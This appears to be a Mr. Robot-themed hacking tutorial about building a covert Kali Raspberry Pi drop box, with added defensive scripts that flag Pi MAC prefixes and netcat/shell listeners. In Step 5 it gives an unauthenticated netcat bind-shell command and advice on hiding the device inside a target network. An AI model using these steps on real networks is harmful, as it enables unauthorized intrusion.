Welcome back, my Mr. Robot aficionados!
Many of you have written me telling me how much you enjoy the Mr. Robot series on USA Network and Amazon Prime. I'm also a huge fan! If you haven't seen it yet, you should. It may be the best hacking show on TV.
Mr. Robot is about a young man with a social conscience (with severe social anxiety and a wicked morphine habit) who works in cyber security by day, protecting the network of Evil Corp; while at night, he is a hacker vigilante for good (does this scenario fit anyone we know?). Eventually, he gets recruited by a hacker group known as fsociety (which looks and acts very much like Anonymous) to bring down Evil Corp.
One of the more interesting elements of the show, from my perspective, is that the hacking is realistic. No swirling, animated viruses like in so many other TV shows and movies, but rather good ole command line Linux.
The Hacking Raspberry Pi
In episode 4 ("eps1.3_da3m0ns.mp4"), Elliot, the main character, is planning on using a Raspberry Pi to control the heating system of the storage room where Evil Corp is storing their tape backups. If they can raise the temperature enough in the storage room, it will render those tape backups unusable.
On these tape backups are the records of 70% of the consumer debt in the world, including billions of dollars of student loans. The hackers believe that if they can destroy these records, millions of people will be free of their student loans and consumer debt held by Evil Corp.
In this tutorial, I will show you how to create a hacking Raspberry Pi (for those of you who are unaware, a Raspberry Pi is a tiny, inexpensive, credit-card sized computer that is powerful) that can be controlled remotely, similar to what Elliot on Mr. Robot is about to use in this episode.
Step 1: Download the ARM Version of Kali
The first step, of course, is to download the ARM version of Kali. Raspberry Pi and many mobile devices use ARM CPUs as they are more energy efficient and cooler, so the Kali operating system must be compiled specifically for it.
Fortunately, the good folks at Offensive Security have already done this for us. Navigate to Offensive Security's download page to get the Raspberry Pi file. Once you have downloaded the image, unzip it with WinRAR, WinZip, or any other archiving tool that can unzip files.
Step 2: Download & Install Win32 Disk Imager
Now we need to install the Win32 Disk Imager, which you can download from SourceForge. This tool enables us to write the image to an SD card or USB drive. I recommend a fast SD card of at least 4 GB. You can buy a 16 GB now for about 7 dollars.
Step 3: Run Disk Imager
Now that you have installed Disk Imager, right click on it and run it as "administrator."
Select the Kali image in the "Image File" window, direct the image to your SD card in the "Device" window, then click on the "Write" button. Be patient, this can take some time.
If you are using Linux, things are a bit simpler. No need to download anything. You simply use the dd command (among other things, the dd command is used to create a disk image in digital forensics). dd overwrites the target without asking, so confirm with lsblk that the device you name really is the SD card. If we assume the image is named Kali-RPI.img and the SD card is at /dev/sdc and we want it to copy in 512k block size (bs), then we simply need to type:
kali > dd if=Kali-RPI.img of=/dev/sdc bs=512k
Step 4: Install the SD Card in the Raspberry Pi
We need to remove the SD card from your PC and now install the SD card into our Raspberry Pi and boot it up. When it boots up, it takes you to a command line asking you for your username and password. The default username and password are:
username: kali
password: kali
Success! Now you have a tiny Kali hacking tool that can be placed anywhere!
Step 5: Start a Netcat Listener on Raspberry Pi
Now that we have Raspberry Pi running Kali, we can place it anywhere within the Evil Corp network. Raspberry Pi has an Ethernet connection and you can add a wireless adapter. The Raspberry Pi is so small it can be hidden in numerous places. These include inside a desktop computer, inside a telephone, clock, etc. without being noticed.
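From the defender's side, a device dropped onto the wire like this still has to answer ARP, so the neighbour table of a host or gateway on the same segment is one place to look for it. The added example below (not part of the original tutorial) filters ip neigh show output for MAC prefixes registered to Raspberry Pi; the function names, prefix list and sample table are constructed for illustration, the list is not exhaustive, and a changed MAC address evades the check.

```shell
#!/bin/sh
# Added example: find neighbours whose MAC prefix (OUI) is registered to
# Raspberry Pi. Assumption: three known prefixes only; extend as needed.
PI_OUIS="b8:27:eb dc:a6:32 e4:5f:01"

# stdin: output of `ip neigh show`; stdout: one "IP MAC" line per match.
find_pi_neighbours() {
    awk -v ouis="$PI_OUIS" '
        BEGIN { n = split(ouis, list, " "); for (i = 1; i <= n; i++) pi[list[i]] = 1 }
        {
            # Entries without a resolved MAC (FAILED/INCOMPLETE) have no lladdr field.
            for (f = 1; f < NF; f++) {
                if ($f != "lladdr") continue
                mac = tolower($(f + 1))
                oui = substr(mac, 1, 8)
                if (oui in pi) print $1, mac
            }
        }'
}

# Constructed sample neighbour table (not captured from a real network).
sample_neigh() {
    cat <<'EOF'
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.105 dev eth0 lladdr B8:27:EB:12:34:56 STALE
192.168.1.77 dev eth0  FAILED
192.168.1.120 dev eth0 lladdr dc:a6:32:aa:bb:cc REACHABLE
EOF
}

# Live use: ip neigh show | find_pi_neighbours
sample_neigh | find_pi_neighbours
```

A hit is a lead for the asset inventory rather than proof of a rogue device, since legitimate Raspberry Pi boards carry the same prefixes.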
Once it is connected, we can start a Netcat listener (Netcat is built into Kali) on it by typing:
kali > nc -l -p6996 -e /bin/sh
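This will enable Elliot to connect to a terminal on the Raspberry Pi from anywhere using port 6996. Note that this listener has no authentication or encryption, so anyone who can reach port 6996 gets the same shell.
Now, Elliot can connect back to the Raspberry Pi by using Netcat on his Kali system and typing: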
kali > nc 192.168.1.105 6996
When he types ifconfig, he can see that he has a terminal on the Raspberry Pi ready to do some hacking of Evil Corp's HVAC system! Make sure to use the IP address of the Raspberry Pi in your environment.
Of course, there are other methods of connecting back to the Raspberry Pi. He could use SSH, and if he wanted a GUI, install the VNC Server and connect back to it with full GUI control over Kali. The problem with both of these methods is that they are more likely to be detected by Evil Corp's perimeter network defenses.
One innovative way to connect would be to turn the wireless adapter into a Wi-Fi AP. In this way, Elliot and friends could connect to the network remotely or at least within the range of Wi-Fi with a good antenna. To turn the RPi into an AP, see my tutorial on Creating an Evil Twin AP here.
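The Netcat listener started in this step is easy to spot on any host you can inspect, because the listening socket is owned by the nc process itself. The added example below (not part of the original tutorial) filters ss -H -ltnp output for listening TCP sockets held by netcat-style tools or shells; the function names, the watch list of process names and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag listening TCP sockets owned by netcat-style tools or
# shells. Run ss as root, otherwise other users' process names are hidden.

# stdin: output of `ss -H -ltnp`; stdout: one "port process pid" line per hit.
flag_shell_listeners() {
    awk '
        $1 == "LISTEN" {
            # Local address is field 4; the port follows the last colon.
            n = split($4, a, ":"); port = a[n]
            if (match($0, /users:\(\("[^"]+",pid=[0-9]+/)) {
                u = substr($0, RSTART, RLENGTH)
                split(u, q, "\"")            # q[2] holds the process name
                pid = u; sub(/.*pid=/, "", pid)
                # Assumed watch list; adjust to your environment.
                if (q[2] ~ /^(nc|ncat|netcat|nc\.traditional|nc\.openbsd|socat|sh|bash|dash)$/)
                    print port, q[2], pid
            }
        }'
}

# Constructed sample of `ss -H -ltnp` output (not from a real host).
sample_ss() {
    cat <<'EOF'
LISTEN 0      1            0.0.0.0:6996      0.0.0.0:*    users:(("nc",pid=1432,fd=3))
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*    users:(("sshd",pid=801,fd=3))
LISTEN 0      128             [::]:22           [::]:*    users:(("sshd",pid=801,fd=4))
LISTEN 0      5          127.0.0.1:5901      0.0.0.0:*    users:(("Xtigervnc",pid=990,fd=7))
LISTEN 0      10              [::]:4444         [::]:*    users:(("ncat",pid=2001,fd=4))
EOF
}

# Live use: ss -H -ltnp | flag_shell_listeners
sample_ss | flag_shell_listeners
```

Each reported PID can then be checked under /proc/PID/cmdline for the -e option that hands the connection to a shell.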
Step 6: Wreak Havoc
Now that Elliot has a Kali install inside Evil Corp's network, he should be able to use the multitude of tools available in Kali for wreaking havoc on Evil Corp. In episode 4, he wants to control the HVAC system and turn up the heat to melt the backup tapes. He should be able to do that now that he has embedded Kali inside Evil Corp's network.
HVAC systems are SCADA/ICS systems like nearly all industrial systems. They have small PLCs embedded in them that are controlled by obscure SCADA/ICS protocols. For more on SCADA/ICS systems, see my SCADA Hacking and Security section.
As this show progresses and Elliot demonstrates more hacks, I will try to keep you up on how he does them.